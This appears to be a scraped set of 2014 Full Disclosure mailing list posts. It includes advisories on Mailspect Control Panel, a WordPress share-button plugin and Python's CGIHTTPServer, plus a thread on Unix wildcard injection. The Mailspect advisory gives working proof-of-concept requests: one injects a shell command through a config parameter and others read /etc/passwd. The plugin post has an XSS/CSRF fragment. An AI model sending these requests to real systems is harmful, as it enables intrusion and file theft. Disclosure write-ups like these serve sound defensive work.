[FD] Back To The Future: Unix Wildcards Gone Wild
Hi, We wanted to inform all major *nix distributions via our responsible disclosure policy about this problem before posting it, because it is highly likely that this problem could lead to local root access on many distributions. But, since part of this research contained in the document was mentioned on some blog entries, we are forced to release it in a full version. Download URL: http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt Regards, Leon Juranic <> ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities
Document Title: Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities Release Date: === June 21, 2014 Product & Service Introduction: Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin. Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter. Subsequently, the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in content filers and reputation engines. Abstract Advisory Information: === BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel 4.0.5 web application. Vulnerability Disclosure Timeline: = May 4, 2014 : Contact with Vendor May 16, 2014: Vendor Response June 21, 2014 : Public Disclosure Discovery Status: = Published Affected Product(s): === Multilayered Email Security & Archive for Gateways, MTA's & Servers Product: Mailspect Control Panel 4.0.5 Other versions may be affected. Exploitation Technique: == RCE:Remote, Authenticated AFR:Remote, Authenticated XSS:Remote, Unauthenticated Severity Level: === High Technical Details & Description: 1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami > /tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to "status_info.cgi?group=default" page. Other parameters with the suffix "_cmd" are probably vulnerable. 2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary file name like "/etc/passwd" will cause the file's content's disclosure. 3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd" will cause the file's content's disclosure. 4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to ">js to be executed leads the Javascript code's execution. Proof of Concept (PoC): == Proof of Concept RCE Request: POST /system_module.cgi HTTP/1.1 Host: 192.168.41.142:20001 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.41.142:20001/system_module.cgi?group=default Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 1282 post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60 2. Proof of Concept AFR Request 1: GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1 Host: 192.168.41.142:20001 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http
[FD] CSRF and stored XSS in Simple Share Buttons Adder 4.4 (WordPress plugin)
Details Software: Simple Share Buttons Adder Version: 4.4 Homepage: https://wordpress.org/plugins/simple-share-buttons-adder/ Advisory report: https://security.dxw.com/advisories/csrf-and-stored-xss-in-simple-share-buttons-adder/ CVE: Awaiting assignment CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:P) Description CSRF and stored XSS in Simple Share Buttons Adder 4.4 Vulnerability An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary javascript in the context of the Homepage, Pages, Posts, Category/Archive pages and post Excerpts. Proof of concept If a logged-in administrator user clicks the submit button on this form, a javascript alert will display on the homepage. (In a real attack the form can be made to auto-submit using Javascript). http://scone.local:8000/wp-admin/options-general.php?page=simple-share-buttons-adder\"; method=\"POST\"> alert(\'foo\')\"> Mitigations Immediately upgrade to version 4.5 or greater. Disclosure policy dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/ Please contact us on secur...@dxw.com to acknowledge this report if you received it via a third party (for example, plug...@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline 2014-06-19: Discovered 2014-06-25: Reported to WP.org and author via email 2014-06-26: Author reports issue fixed in version 4.5 Discovered by dxw: Duncan Stuart Please visit security.dxw.com for more information. ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution
Advisory: Python CGIHTTPServer File Disclosure and Potential Code
Execution
The CGIHTTPServer Python module does not properly handle URL-encoded
path separators in URLs. This may enable attackers to disclose a CGI
script's source code or execute arbitrary CGI scripts in the server's
document root.
Details
===
Product: Python CGIHTTPServer
Affected Versions:
2.7 - 2.7.7,
3.2 - 3.2.4,
3.3 - 3.3.2,
3.4 - 3.4.1,
3.5 pre-release
Fixed Versions:
2.7 rev b4bab0788768,
3.2 rev e47422855841,
3.3 rev 5676797f3a3e,
3.4 rev 847e288d6e93,
3.5 rev f8b3bb5eb190
Vulnerability Type: File Disclosure, Directory Traversal, Code Execution
Security Risk: high
Vendor URL: https://docs.python.org/2/library/cgihttpserver.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008
Advisory Status: published
CVE: CVE-2014-4650
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650
Introduction
The CGIHTTPServer module defines a request-handler class, interface
compatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits
behavior from SimpleHTTPServer. SimpleHTTPRequestHandler but can also
run CGI scripts.
(from the Python documentation)
More Details
The CGIHTTPServer module can be used to set up a simple HTTP server with
CGI scripts. A sample server script in Python may look like the
following:
#!/usr/bin/env python2
import CGIHTTPServer
import BaseHTTPServer
if __name__ == "__main__":
server = BaseHTTPServer.HTTPServer
handler = CGIHTTPServer.CGIHTTPRequestHandler
server_address = ("", 8000)
# Note that only /cgi-bin will work:
handler.cgi_directories = ["/cgi-bin", "/cgi-bin/subdir"]
httpd = server(server_address, handler)
httpd.serve_forever()
This server should execute any scripts located in the subdirectory
"cgi-bin". A sample CGI script can be placed in that directory, for
example a script like the following:
#!/usr/bin/env python2
import json
import sys
db_credentials = "SECRET"
sys.stdout.write("Content-type: text/json\r\n\r\n")
sys.stdout.write(json.dumps({"text": "This is a Test"}))
The Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler
class which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler:
class SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
[...]
def do_GET(self):
"""Serve a GET request."""
f = self.send_head()
if f:
try:
self.copyfile(f, self.wfile)
finally:
f.close()
def do_HEAD(self):
"""Serve a HEAD request."""
f = self.send_head()
if f:
f.close()
def translate_path(self, path):
[...]
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = os.getcwd()
[...]
The CGIHTTPRequestHandler class inherits, among others, the methods
do_GET() and do_HEAD() for handling HTTP GET and HTTP HEAD requests. The
class overrides send_head() and implements several new methods, such as
do_POST(), is_cgi() and run_cgi():
class CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
[...]
def do_POST(self):
[...]
if self.is_cgi():
self.run_cgi()
else:
self.send_error(501, "Can only POST to CGI scripts")
def send_head(self):
"""Version of send_head that support CGI scripts"""
if self.is_cgi():
return self.run_cgi()
else:
return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)
def is_cgi(self):
[...]
collapsed_path = _url_collapse_path(self.path)
dir_sep = collapsed_path.find('/', 1)
head, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:]
if head in self.cgi_directories:
self.cgi_info = head, tail
return True
return False
[...]
def run_cgi(self):
"""Execute a CGI script."""
dir, rest = self.cgi_info
[...]
# dissect the part after the directory name into a script name &
# a possible additional path, to be stored in PATH_INFO.
i = rest.find('/')
if i >= 0:
script, rest = rest[:i], rest[i:]
else:
script, rest = rest, ''
scriptname = dir + '/' + script
scriptfile = self.translate_path(scriptname)
if not os.path.exists(scriptfile):
self.send_error(404, "No such CGI script (%r)" % scriptname)
return
if not os.path.isfile(scriptfile):
self.s
Re: [FD] Back To The Future: Unix Wildcards Gone Wild
> We wanted to inform all major *nix distributions via our responsible > disclosure policy about this problem before posting it I'm not sure how to put it mildly, but I think you might have been scooped on this some 1-2 decades ago... Off the top of my head, there's a rant about this behavior in "The Unix-Haters Handbook", and there are several highly detailed articles by David Wheeler published over the years (e.g., http://www.dwheeler.com/essays/filenames-in-shell.html). Yup, it's a counterintuitive behavior that leads to security problems. The odds of changing the semantics at this point are very slim. Other operating systems have their own idiosyncrasies in this area - for example, Windows it not a lot better with parameter splitting and special filenames. /mz ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
